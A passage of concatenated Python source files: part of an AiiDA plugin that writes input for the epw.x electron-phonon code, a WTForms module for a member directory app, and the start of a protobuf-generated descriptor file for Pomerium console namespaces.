lists that are to be retrieved after job completion.
:param folder: a sandbox folder to temporarily write files on disk.
:return: :py:`~aiida.common.datastructures.CalcInfo` instance.
"""
def test_offset(offset):
"""Check if the grid has an offset."""
if any([i != 0. for i in offset]):
raise NotImplementedError(
'Computation of electron-phonon on a mesh with non zero offset is not implemented, '
'at the level of epw.x')
# pylint: disable=too-many-statements,too-many-branches
local_copy_list = []
remote_copy_list = []
remote_symlink_list = []
if 'settings' in self.inputs:
settings = _uppercase_dict(self.inputs.settings.get_dict(), dict_name='settings')
else:
settings = {}
# Copy nscf folder
parent_folder_nscf = self.inputs.parent_folder_nscf
parent_calc_nscf = parent_folder_nscf.creator
if parent_calc_nscf is None:
raise exceptions.NotExistent(f'parent_folder<{parent_folder_nscf.pk}> has no parent calculation')
# Also, the parent calculation must be on the same computer
if not self.node.computer.uuid == parent_calc_nscf.computer.uuid:
raise exceptions.InputValidationError(
'Calculation has to be launched on the same computer as that of the parent: {}'.format(
parent_calc_nscf.computer.get_name()))
# put by default, default_parent_output_folder = ./out
parent_calc_out_subfolder_nscf = parent_calc_nscf.process_class._OUTPUT_SUBFOLDER # pylint: disable=protected-access
# Now phonon folder
parent_folder_ph = self.inputs.parent_folder_ph
parent_calc_ph = parent_folder_ph.creator
# Also, the parent calculation must be on the same computer
if not self.node.computer.uuid == parent_calc_ph.computer.uuid:
raise exceptions.InputValidationError(
'Calculation has to be launched on the same computer as that of the parent: {}'.format(
parent_calc_ph.computer.get_name()))
# I put the first-level keys as uppercase (i.e., namelist and card names) and the second-level keys as lowercase
parameters = _uppercase_dict(self.inputs.parameters.get_dict(), dict_name='parameters')
parameters = {k: _lowercase_dict(v, dict_name=k) for k, v in parameters.items()}
if 'INPUTEPW' not in parameters:
raise exceptions.InputValidationError('required namelist INPUTEPW not specified')
parameters['INPUTEPW']['outdir'] = self._OUTPUT_SUBFOLDER
parameters['INPUTEPW']['iverbosity'] = 1
parameters['INPUTEPW']['prefix'] = self._PREFIX
try:
mesh, offset = self.inputs.qpoints.get_kpoints_mesh()
test_offset(offset)
parameters['INPUTEPW']['nq1'] = mesh[0]
parameters['INPUTEPW']['nq2'] = mesh[1]
parameters['INPUTEPW']['nq3'] = mesh[2]
postpend_text = None
except NotImplementedError as exception:
raise exceptions.InputValidationError('Cannot get the coarse q-point grid') from exception
try:
mesh, offset = self.inputs.kpoints.get_kpoints_mesh()
test_offset(offset)
parameters['INPUTEPW']['nk1'] = mesh[0]
parameters['INPUTEPW']['nk2'] = mesh[1]
parameters['INPUTEPW']['nk3'] = mesh[2]
postpend_text = None
except NotImplementedError as exception:
raise exceptions.InputValidationError('Cannot get the coarse k-point grid') from exception
try:
mesh, offset = self.inputs.qfpoints.get_kpoints_mesh()
test_offset(offset)
parameters['INPUTEPW']['nqf1'] = mesh[0]
parameters['INPUTEPW']['nqf2'] = mesh[1]
parameters['INPUTEPW']['nqf3'] = mesh[2]
postpend_text = None
except NotImplementedError as exception:
raise exceptions.InputValidationError('Cannot get the fine q-point grid') from exception
try:
mesh, offset = self.inputs.kfpoints.get_kpoints_mesh()
test_offset(offset)
parameters['INPUTEPW']['nkf1'] = mesh[0]
parameters['INPUTEPW']['nkf2'] = mesh[1]
parameters['INPUTEPW']['nkf3'] = mesh[2]
postpend_text = None
except NotImplementedError as exception:
raise exceptions.InputValidationError('Cannot get the fine k-point grid') from exception
# customized namelists, otherwise not present in the distributed epw code
try:
namelists_toprint = settings.pop('NAMELISTS')
if not isinstance(namelists_toprint, list):
raise exceptions.InputValidationError(
"The 'NAMELISTS' value, if specified in the settings input "
'node, must be a list of strings')
except KeyError: # list of namelists not specified in the settings; do automatic detection
namelists_toprint = self._compulsory_namelists
# create the save folder with dvscf and dyn files.
folder.get_subfolder(self._FOLDER_SAVE, create=True)
# List of IBZ q-point to be added below EPW. To be removed when removed from EPW.
qibz_ar = []
for key, value in sorted(parent_folder_ph.creator.outputs.output_parameters.get_dict().items()):
if key.startswith('dynamical_matrix_'):
qibz_ar.append(value['q_point'])
qibz_node = orm.ArrayData()
qibz_node.set_array('qibz', np.array(qibz_ar))
list_of_points = qibz_node.get_array('qibz')
# Number of q-point in the irreducible Brillouin Zone.
nqpt = len(list_of_points[0, :])
# add here the list of point coordinates
if len(list_of_points) > 1:
postpend_text = f'{len(list_of_points)} cartesian\n'
for points in list_of_points:
postpend_text += '{0:18.10f} {1:18.10f} {2:18.10f} \n'.format(*points)
with folder.open(self.metadata.options.input_filename, 'w') as infile:
for namelist_name in namelists_toprint:
infile.write(f'&{namelist_name}\n')
# namelist content; set to {} if not present, so that we leave an empty namelist
namelist = parameters.pop(namelist_name, {})
for key, value in sorted(namelist.items()):
infile.write(convert_input_to_namelist_entry(key, value))
infile.write('/\n')
# add list of qpoints if required
if postpend_text is not None:
infile.write(postpend_text)
if parameters:
raise exceptions.InputValidationError(
'The following namelists are specified in parameters, but are '
'not valid namelists for the current type of calculation: '
'{}'.format(','.join(list(parameters.keys()))))
# copy the parent scratch
symlink = settings.pop('PARENT_FOLDER_SYMLINK', self._default_symlink_usage) # a boolean
if symlink:
# I create a symlink to each file/folder in the parent ./out
folder.get_subfolder(self._OUTPUT_SUBFOLDER, create=True)
remote_symlink_list.append((
parent_folder_nscf.computer.uuid,
os.path.join(parent_folder_nscf.get_remote_path(), parent_calc_out_subfolder_nscf, '*'),
self._OUTPUT_SUBFOLDER
))
else:
# here I copy the whole folder ./out
remote_copy_list.append((
parent_folder_nscf.computer.uuid,
os.path.join(parent_folder_nscf.get_remote_path(), parent_calc_out_subfolder_nscf),
self._OUTPUT_SUBFOLDER
))
prefix = self._PREFIX
for iqpt in range(1, nqpt+1):
label = str(iqpt)
tmp_path = os.path.join(self._FOLDER_DYNAMICAL_MATRIX, 'dynamical-matrix-0')
remote_copy_list.append((
parent_folder_ph.computer.uuid,
os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
'save/'+prefix+'.dyn_q0'))
tmp_path = os.path.join(self._FOLDER_DYNAMICAL_MATRIX, 'dynamical-matrix-'+label)
remote_copy_list.append((
parent_folder_ph.computer.uuid,
os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
'save/'+prefix+'.dyn_q'+label))
if iqpt == 1:
tmp_path = os.path.join(self._OUTPUT_SUBFOLDER, '_ph0/'+prefix+'.dvscf*')
remote_copy_list.append((
parent_folder_ph.computer.uuid,
os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
'save/'+prefix+'.dvscf_q'+label))
tmp_path = os.path.join(self._OUTPUT_SUBFOLDER, '_ph0/'+prefix+'.phsave')
remote_copy_list.append((
parent_folder_ph.computer.uuid,
os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
'save/'))
else:
tmp_path = os.path.join(self._OUTPUT_SUBFOLDER, '_ph0/'+prefix+'.q_'+label+'/'+prefix+'.dvscf*')
remote_copy_list.append((
parent_folder_ph.computer.uuid,
os.path.join(parent_folder_ph.get_remote_path(), tmp_path),
'save/'+prefix+'.dvscf_q'+label))
codeinfo = datastructures.CodeInfo()
codeinfo.cmdline_params = (list(settings.pop('CMDLINE', [])) + ['-in', self.metadata.options.input_filename])
codeinfo.stdout_name = self.metadata.options.output_filename
codeinfo.code_uuid = self.inputs.code.uuid
calcinfo = datastructures.CalcInfo()
calcinfo.codes_info = [codeinfo]
calcinfo.local_copy_list = local_copy_list
calcinfo.remote_copy_list = remote_copy_list
calcinfo.remote_symlink_list = remote_symlink_list
# Retrieve by default the output file
calcinfo.retrieve_list = []
calcinfo.retrieve_list.append(self.metadata.options.output_filename)
calcinfo.retrieve_list += settings.pop('ADDITIONAL_RETRIEVE_LIST', [])
if settings:
unknown_keys = ', '.join(list(settings.keys()))
raise exceptions.InputValidationError(f'`settings` contained unexpected keys: {unknown_keys}')
return calcinfo
|
# encoding: utf8
from collections import OrderedDict
from wtforms_alchemy import (ModelForm, QuerySelectField,
DataRequired)
from wtforms import TextField
from wtforms.validators import EqualTo, Required
from wtforms.fields import FormField, PasswordField, HiddenField
from wtforms.widgets import Input, HTMLString
from trombi import mappings
from trombi.db import Session
from trombi.mappings import City
def get_codes():
from trombi.db import Session
session = Session()
return session.query(mappings.Category)
def get_city():
from trombi.db import Session
session = Session()
sq = session.query(mappings.Member.city_id).distinct().subquery()
return session.query(mappings.City).filter(mappings.City.id.in_(sq))
def get_city_label(city):
return '%s (%s)' % (city.label, city.zipcode)
def get_membership():
from trombi.db import Session
session = Session()
return session.query(mappings.Membership)
class BaseForm(ModelForm):
def __iter__(self):
field_order = getattr(self, 'field_order', None)
if field_order:
temp_fields = []
for name in field_order:
if name == '*':
for k, v in self._fields.items():
if k not in field_order:
temp_fields.append((k, v))
break
else:
temp_fields.append((name, self._fields[name]))
self._fields = OrderedDict(temp_fields)
return super(BaseForm, self).__iter__()
def can_edit(self, member, field):
return False
class CategoryForm(BaseForm):
class Meta:
model = mappings.Category
include_primary_keys = True
class MembershipForm(BaseForm):
class Meta:
model = mappings.Membership
include_primary_keys = True
class CityForm(BaseForm):
class Meta:
model = mappings.City
class ChangePassword(BaseForm):
token = HiddenField('token')
login = HiddenField('login')
password = PasswordField('Mot de passe',
[Required(), EqualTo('confirm',
message=u'Les mots de passe diffèrent')])
confirm = PasswordField('Resaisir mot de passe')
class CityInput(Input):
input_type = 'city'
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
kwargs.setdefault('type', self.input_type)
if 'value' not in kwargs:
kwargs['value'] = field._value()
params = self.html_params(name=field.name, **kwargs)
return HTMLString('<input %s/>' % params)
class CityField(TextField):
widget = CityInput()
def validate(self, form, extra_validators=()):
if isinstance(self.data, unicode):
db = Session()
city_data = self.data.split(u'(')
if len(city_data) == 2:
city = city_data[0].strip()
zipcode = city_data[1].strip()[:-1]
city = db.query(City).filter(City.zipcode==zipcode,
City.label==city).first()
if city:
self.data = city
return True
self.errors = ['Unkown city']
return False
return True
class MemberForm(BaseForm):
class Meta:
model = mappings.Member
include_primary_keys = False
exclude = ['password']
category = QuerySelectField('category', query_factory=get_codes,
get_label='label')
membership = QuerySelectField('membership', query_factory=get_membership,
get_label='label')
city = CityField('city')
field_order = ('is_published', 'bio', 'email', 'phone', 'phone2',
'address', 'city', '*')
user_can_change = ['is_published', 'bio', 'email', 'phone', 'phone2',
'address', 'city']
def can_edit(self, member, field):
if member.is_super_user:
return True
if member.email != self.email.data:
return False
# that's my data !
return field.name in self.user_can_change
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: namespaces.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='namespaces.proto',
package='pomerium.dashboard',
syntax='proto3',
serialized_options=b'Z+github.com/pomerium/pomerium-console/pkg/pb',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x10namespaces.proto\x12\x12pomerium.dashboard\x1a\x1fgoogle/protobuf/timestamp.proto\"\xf4\x01\n\tNamespace\x12\n\n\x02id\x18\x01 \x01(\t\x12\x11\n\tparent_id\x18\x02 \x01(\t\x12.\n\ncreated_at\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12/\n\x0bmodified_at\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12.\n\ndeleted_at\x18\x05 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x0c\n\x04name\x18\x06 \x01(\t\x12\x13\n\x0broute_count\x18\x07 \x01(\x03\x12\x14\n\x0cpolicy_count\x18\x08 \x01(\x03\"$\n\x16\x44\x65leteNamespaceRequest\x12\n\n\x02id\x18\x01 \x01(\t\"\x19\n\x17\x44\x65leteNamespaceResponse\"!\n\x13GetNamespaceRequest\x12\n\n\x02id\x18\x01 \x01(\t\"H\n\x14GetNamespaceResponse\x12\x30\n\tnamespace\x18\x01 \x01(\x0b\x32\x1d.pomerium.dashboard.Namespace\"\x17\n\x15ListNamespacesRequest\"K\n\x16ListNamespacesResponse\x12\x31\n\nnamespaces\x18\x01 \x03(\x0b\x32\x1d.pomerium.dashboard.Namespace\"G\n\x13SetNamespaceRequest\x12\x30\n\tnamespace\x18\x01 \x01(\x0b\x32\x1d.pomerium.dashboard.Namespace\"H\n\x14SetNamespaceResponse\x12\x30\n\tnamespace\x18\x01 \x01(\x0b\x32\x1d.pomerium.dashboard.Namespace\"\xe8\x01\n\x13NamespacePermission\x12\n\n\x02id\x18\x01 \x01(\t\x12.\n\ncreated_at\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12/\n\x0bmodified_at\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x14\n\x0cnamespace_id\x18\x04 \x01(\t\x12\x16\n\x0enamespace_name\x18\x08 \x01(\t\x12\x14\n\x0csubject_type\x18\x05 \x01(\t\x12\x12\n\nsubject_id\x18\x06 \x01(\t\x12\x0c\n\x04role\x18\x07 \x01(\t\"\x91\x01\n\x18NamespacePermissionGroup\x12\x10\n\x08group_id\x18\x01 \x01(\t\x12\x12\n\ngroup_name\x18\x02 \x01(\t\x12\x13\n\x0bgroup_email\x18\x03 \x01(\t\x12\x14\n\x0cnamespace_id\x18\x04 \x01(\t\x12\x16\n\x0enamespace_name\x18\x05 \x01(\t\x12\x0c\n\x04role\x18\x06 \x01(\t\"\xa0\x01\n\x17NamespacePermissionUser\x12\x0f\n\x07user_id\x18\x01 \x01(\t\x12\x11\n\tuser_name\x18\x02 \x01(\t\x12\x12\n\nuser_email\x18\x03 \x01(\t\x12\x11\n\tgroup_ids\x18\x04 \x03(\t\x12\x14\n\x0cnamespace_id\x18\x05 \x01(\t\x12\x16\n\x0enamespace_name\x18\x07 \x01(\t\x12\x0c\n\x04role\x18\x06 \x01(\t\".\n DeleteNamespacePermissionRequest\x12\n\n\x02id\x18\x01 \x01(\t\"#\n!DeleteNamespacePermissionResponse\"+\n\x1dGetNamespacePermissionRequest\x12\n\n\x02id\x18\x01 \x01(\t\"g\n\x1eGetNamespacePermissionResponse\x12\x45\n\x14namespace_permission\x18\x01 \x01(\x0b\x32\'.pomerium.dashboard.NamespacePermission\"!\n\x1fListNamespacePermissionsRequest\"j\n ListNamespacePermissionsResponse\x12\x46\n\x15namespace_permissions\x18\x01 \x03(\x0b\x32\'.pomerium.dashboard.NamespacePermission\"<\n$ListNamespacePermissionGroupsRequest\x12\x14\n\x0cnamespace_id\x18\x01 \x01(\t\"e\n%ListNamespacePermissionGroupsResponse\x12<\n\x06groups\x18\x01 \x03(\x0b\x32,.pomerium.dashboard.NamespacePermissionGroup\";\n#ListNamespacePermissionUsersRequest\x12\x14\n\x0cnamespace_id\x18\x01 \x01(\t\"b\n$ListNamespacePermissionUsersResponse\x12:\n\x05users\x18\x01 \x03(\x0b\x32+.pomerium.dashboard.NamespacePermissionUser\"f\n\x1dSetNamespacePermissionRequest\x12\x45\n\x14namespace_permission\x18\x01 \x01(\x0b\x32\'.pomerium.dashboard.NamespacePermission\"g\n\x1eSetNamespacePermissionResponse\x12\x45\n\x14namespace_permission\x18\x01 \x01(\x0b\x32\'.pomerium.dashboard.NamespacePermission2\xad\x03\n\x10NamespaceService\x12j\n\x0f\x44\x65leteNamespace\x12*.pomerium.dashboard.DeleteNamespaceRequest\x1a+.pomerium.dashboard.DeleteNamespaceResponse\x12\x61\n\x0cGetNamespace\x12\'.pomerium.dashboard.GetNamespaceRequest\x1a(.pomerium.dashboard.GetNamespaceResponse\x12g\n\x0eListNamespaces\x12).pomerium.dashboard.ListNamespacesRequest\x1a*.pomerium.dashboard.ListNamespacesResponse\x12\x61\n\x0cSetNamespace\x12\'.pomerium.dashboard.SetNamespaceRequest\x1a(.pomerium.dashboard.SetNamespaceResponse2\xdc\x06\n\x1aNamespacePermissionService\x12\x88\x01\n\x19\x44\x65leteNamespacePermission\x12\x34.pomerium.dashboard.DeleteNamespacePermissionRequest\x1a\x35.pomerium.dashboard.DeleteNamespacePermissionResponse\x12\x7f\n\x16GetNamespacePermission\x12\x31.pomerium.dashboard.GetNamespacePermissionRequest\x1a\x32.pomerium.dashboard.GetNamespacePermissionResponse\x12\x85\x01\n\x18ListNamespacePermissions\x12\x33.pomerium.dashboard.ListNamespacePermissionsRequest\x1a\x34.pomerium.dashboard.ListNamespacePermissionsResponse\x12\x94\x01\n\x1dListNamespacePermissionGroups\x12\x38.pomerium.dashboard.ListNamespacePermissionGroupsRequest\x1a\x39.pomerium.dashboard.ListNamespacePermissionGroupsResponse\x12\x91\x01\n\x1cListNamespacePermissionUsers\x12\x37.pomerium.dashboard.ListNamespacePermissionUsersRequest\x1a\x38.pomerium.dashboard.ListNamespacePermissionUsersResponse\x12\x7f\n\x16SetNamespacePermission\x12\x31.pomerium.dashboard.SetNamespacePermissionRequest\x1a\x32.pomerium.dashboard.SetNamespacePermissionResponseB-Z+github.com/pomerium/pomerium-console/pkg/pbb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,])
_NAMESPACE = _descriptor.Descriptor(
name='Namespace',
full_name='pomerium.dashboard.Namespace',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.Namespace.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parent_id', full_name='pomerium.dashboard.Namespace.parent_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_at', full_name='pomerium.dashboard.Namespace.created_at', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modified_at', full_name='pomerium.dashboard.Namespace.modified_at', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deleted_at', full_name='pomerium.dashboard.Namespace.deleted_at', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='pomerium.dashboard.Namespace.name', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='route_count', full_name='pomerium.dashboard.Namespace.route_count', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='policy_count', full_name='pomerium.dashboard.Namespace.policy_count', index=7,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=318,
)
_DELETENAMESPACEREQUEST = _descriptor.Descriptor(
name='DeleteNamespaceRequest',
full_name='pomerium.dashboard.DeleteNamespaceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.DeleteNamespaceRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=320,
serialized_end=356,
)
_DELETENAMESPACERESPONSE = _descriptor.Descriptor(
name='DeleteNamespaceResponse',
full_name='pomerium.dashboard.DeleteNamespaceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=358,
serialized_end=383,
)
_GETNAMESPACEREQUEST = _descriptor.Descriptor(
name='GetNamespaceRequest',
full_name='pomerium.dashboard.GetNamespaceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.GetNamespaceRequest.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=385,
serialized_end=418,
)
_GETNAMESPACERESPONSE = _descriptor.Descriptor(
name='GetNamespaceResponse',
full_name='pomerium.dashboard.GetNamespaceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='pomerium.dashboard.GetNamespaceResponse.namespace', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=420,
serialized_end=492,
)
_LISTNAMESPACESREQUEST = _descriptor.Descriptor(
name='ListNamespacesRequest',
full_name='pomerium.dashboard.ListNamespacesRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=494,
serialized_end=517,
)
_LISTNAMESPACESRESPONSE = _descriptor.Descriptor(
name='ListNamespacesResponse',
full_name='pomerium.dashboard.ListNamespacesResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespaces', full_name='pomerium.dashboard.ListNamespacesResponse.namespaces', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=519,
serialized_end=594,
)
_SETNAMESPACEREQUEST = _descriptor.Descriptor(
name='SetNamespaceRequest',
full_name='pomerium.dashboard.SetNamespaceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='pomerium.dashboard.SetNamespaceRequest.namespace', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=596,
serialized_end=667,
)
_SETNAMESPACERESPONSE = _descriptor.Descriptor(
name='SetNamespaceResponse',
full_name='pomerium.dashboard.SetNamespaceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='namespace', full_name='pomerium.dashboard.SetNamespaceResponse.namespace', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=669,
serialized_end=741,
)
_NAMESPACEPERMISSION = _descriptor.Descriptor(
name='NamespacePermission',
full_name='pomerium.dashboard.NamespacePermission',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='pomerium.dashboard.NamespacePermission.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_at', full_name='pomerium.dashboard.NamespacePermission.created_at', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modified_at', full_name='pomerium.dashboard.NamespacePermission.modified_at', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_id', full_name='pomerium.dashboard.NamespacePermission.namespace_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='namespace_name', full_name='pomerium.dashboard.NamespacePermission.namespace_name', index=4,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subject_type', full_name='pomerium.dashboard.NamespacePermission.subject_type', index=5,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='subject_id', full_name='pomerium.dashboard.NamespacePermission.subject_id', index=6,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='role', full_name='pomerium.dashboard.NamespacePermission.role', index=7,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=744,
serialized_end=976,
)
_NAMESPACEPERMISSIONGROUP = _descriptor.Descriptor(
name='NamespacePermissionGroup',
full_name='pomerium.dashboard.NamespacePermissionGroup',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='group_id', full_name='pomerium.dashboard.NamespacePermissionGroup.group_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='group_name', full_name='pomerium.dashboard.NamespacePermissionGroup.group_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
